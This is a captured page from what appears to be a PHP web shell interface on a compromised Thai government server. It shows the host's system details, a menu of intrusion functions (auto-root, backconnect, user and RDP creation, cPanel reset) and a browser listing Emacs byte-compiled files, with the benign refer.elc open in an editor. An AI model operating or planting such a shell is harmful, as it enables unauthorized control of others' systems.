Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
textmodes /
[ HOME SHELL ]
Name
Size
Permission
Action
artist.elc
156.01
KB
-rw-r--r--
bib-mode.elc
7.43
KB
-rw-r--r--
bibtex-style.elc
5.39
KB
-rw-r--r--
bibtex.elc
157.5
KB
-rw-r--r--
conf-mode.elc
28.99
KB
-rw-r--r--
css-mode.elc
13.28
KB
-rw-r--r--
dns-mode.elc
6.9
KB
-rw-r--r--
enriched.elc
13.78
KB
-rw-r--r--
fill.elc
34.12
KB
-rw-r--r--
flyspell.elc
52.56
KB
-rw-r--r--
ispell.elc
97.58
KB
-rw-r--r--
makeinfo.elc
6.2
KB
-rw-r--r--
nroff-mode.elc
10.21
KB
-rw-r--r--
page-ext.elc
15.45
KB
-rw-r--r--
page.elc
3.19
KB
-rw-r--r--
paragraphs.elc
15.18
KB
-rw-r--r--
picture.elc
26.27
KB
-rw-r--r--
po.elc
2.84
KB
-rw-r--r--
refbib.elc
18.08
KB
-rw-r--r--
refer.elc
9.21
KB
-rw-r--r--
refill.elc
6.17
KB
-rw-r--r--
reftex-auc.elc
6
KB
-rw-r--r--
reftex-cite.elc
26.53
KB
-rw-r--r--
reftex-dcr.elc
12.53
KB
-rw-r--r--
reftex-global.elc
12.67
KB
-rw-r--r--
reftex-index.elc
61.35
KB
-rw-r--r--
reftex-parse.elc
21.31
KB
-rw-r--r--
reftex-ref.elc
19.57
KB
-rw-r--r--
reftex-sel.elc
16.58
KB
-rw-r--r--
reftex-toc.elc
30.88
KB
-rw-r--r--
reftex-vars.elc
80.53
KB
-rw-r--r--
reftex.elc
56.79
KB
-rw-r--r--
remember.elc
12.73
KB
-rw-r--r--
rst.elc
72.23
KB
-rw-r--r--
sgml-mode.elc
80.43
KB
-rw-r--r--
spell.elc
4.04
KB
-rw-r--r--
table.elc
161.74
KB
-rw-r--r--
tex-mode.elc
87.19
KB
-rw-r--r--
texinfmt.elc
83.84
KB
-rw-r--r--
texinfo.elc
35.12
KB
-rw-r--r--
texnfo-upd.elc
45.86
KB
-rw-r--r--
text-mode.elc
7.39
KB
-rw-r--r--
tildify.elc
8.47
KB
-rw-r--r--
two-column.elc
12.86
KB
-rw-r--r--
underline.elc
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : refer.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:05:19 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/textmodes/refer.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`refer.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\301\303\304\305\306\307\310&\207" [provide refer custom-declare-group nil "Look up references in bibliography files." :prefix "refer-" :group wp] 8) #@794 Directory, or list of directories, to search for \.bib files. Can be set to 'bibinputs or 'texinputs, in which case the environment variable BIBINPUTS or TEXINPUTS, respectively, is used to obtain a list of directories. Useful only if `refer-bib-files' is set to 'dir or a list of file names (without directory). A value of nil indicates the current working directory. If `refer-bib-directory' is 'bibinputs or 'texinputs, it is setq'd to the appropriate list of directories when it is first used. Note that an empty directory is interpreted by BibTeX as indicating the default search path. Since Refer does not know that default path, it cannot search it. Include that path explicitly in your BIBINPUTS environment if you really want it searched (which is not likely to happen anyway). (custom-declare-variable 'refer-bib-directory 'nil '(#$ . 792) :type '(choice (repeat directory) (const bibinputs) (const texinputs)) :group 'refer) #@781 *List of \.bib files to search for references, or one of the following special values: nil = prompt for \.bib file (if visiting a \.bib file, use it as default) auto = read \.bib file names from appropriate command in buffer (see `refer-bib-files-regexp') unless the buffer's mode is `bibtex-mode', in which case only the buffer is searched dir = use all \.bib files in directories referenced by `refer-bib-directory'. If a specified file doesn't exist and has no extension, a \.bib extension is automatically tried. If `refer-bib-files' is nil, auto or dir, it is setq'd to the appropriate list of files when it is first used if `refer-cache-bib-files' is t. If `refer-cache-bib-files' is nil, the list of \.bib files to use is re-read each time it is needed. (custom-declare-variable 'refer-bib-files ''dir '(#$ . -1741) :type '(choice (repeat file) (const nil) (const auto) (const dir)) :group 'refer) #@262 *Variable determining whether the value of `refer-bib-files' should be cached. If t, initialize the value of refer-bib-files the first time it is used. If nil, re-read the list of \.bib files depending on the value of `refer-bib-files' each time it is needed. (custom-declare-variable 'refer-cache-bib-files 't '(#$ . -2672) :type 'boolean :group 'refer) #@501 *Regexp matching a bibliography file declaration. The current buffer is expected to contain a line such as \bibliography{file1,file2,file3} which is read to set up `refer-bib-files'. The regexp must specify the command (such as \bibliography) that is used to specify the list of bib files. The command is expected to specify a file name, or a list of comma-separated file names, within curly braces. If a specified file doesn't exist and has no extension, a \.bib extension is automatically tried. (custom-declare-variable 'refer-bib-files-regexp '"\\\\bibliography" '(#$ . -3035) :type 'regexp :group 'refer) (byte-code "\301\302!\210\301\303!\210\301\304!\210\305B\306\305!\204 \307\305\310\"\210\311B\306\311!\204* \307\311\310\"\210\312B\306\312!\2049 \307\312\310\"\210\313B\306\313!\204H \307\313\310\"\210\310\207" [current-load-list make-variable-buffer-local refer-bib-files refer-cache-bib-files refer-bib-directory refer-saved-state default-boundp set-default nil refer-previous-keywords refer-saved-pos refer-same-file] 3) #@254 Find entry in refer-bib-files containing KEYWORDS. If KEYWORDS is nil, prompt user for blank-separated list of keywords. If CONTINUE is non-nil, or if called interactively with a prefix arg, look for next entry by continuing search from previous point. (defalias 'refer-find-entry #[(keywords &optional continue) "\204 \203\f \n\202 \303\304!\305 \"\207" [keywords continue refer-previous-keywords read-string "Keywords: " refer-find-entry-internal] 3 (#$ . 4088) (list nil current-prefix-arg)]) #@78 Find next occurrence of entry in `refer-bib-files'. See `refer-find-entry'. (defalias 'refer-find-next-entry #[nil "\301\302\"\207" [refer-previous-keywords refer-find-entry-internal t] 3 (#$ . 4598) nil]) #@130 Inserts at point in current buffer the "key" field of the entry found on the last `refer-find-entry' or `refer-find-next-entry'. (defalias 'refer-yank-key #[nil "`\301\213c\210`U?\205 \302!)\207" [old-point ((byte-code "\212\301@!\210\302\303!\203 \304\224\304\225{\202 \305\306@\")\207" [refer-saved-state find-file looking-at "[ \n]*@\\s-*[a-zA-Z][a-zA-Z0-9]*\\s-*{\\s-*\\([^ \n,]+\\)\\s-*," 1 error "Cannot find key for entry in file %s"] 3)) set-mark] 2 (#$ . 4813) nil]) (defalias 'refer-find-entry-internal #[(keywords continue) "\306!p\307 \307 \203 \n\202 \310\311 \312\310\211\313\314!\211\204? \315\316!\2038 \317 \320\316\"\321\203J \202L !\210\305\322\215\210\321!.\207" [keywords continue refer-saved-state refer-saved-pos file found refer-convert-string-to-list-of-strings selected-window nil refer-get-bib-files 0 get-window-with-predicate #[(w) " 8\211\203 T\211\203 \n\304\305!!\230\203 \n\207" [n files file w buffer-file-name window-buffer] 4] one-window-p nomini split-window next-window select-window (byte-code "\203X \306@!\203 @\202 \306@\307P!\205 @\307P \203D \310 \f#\203<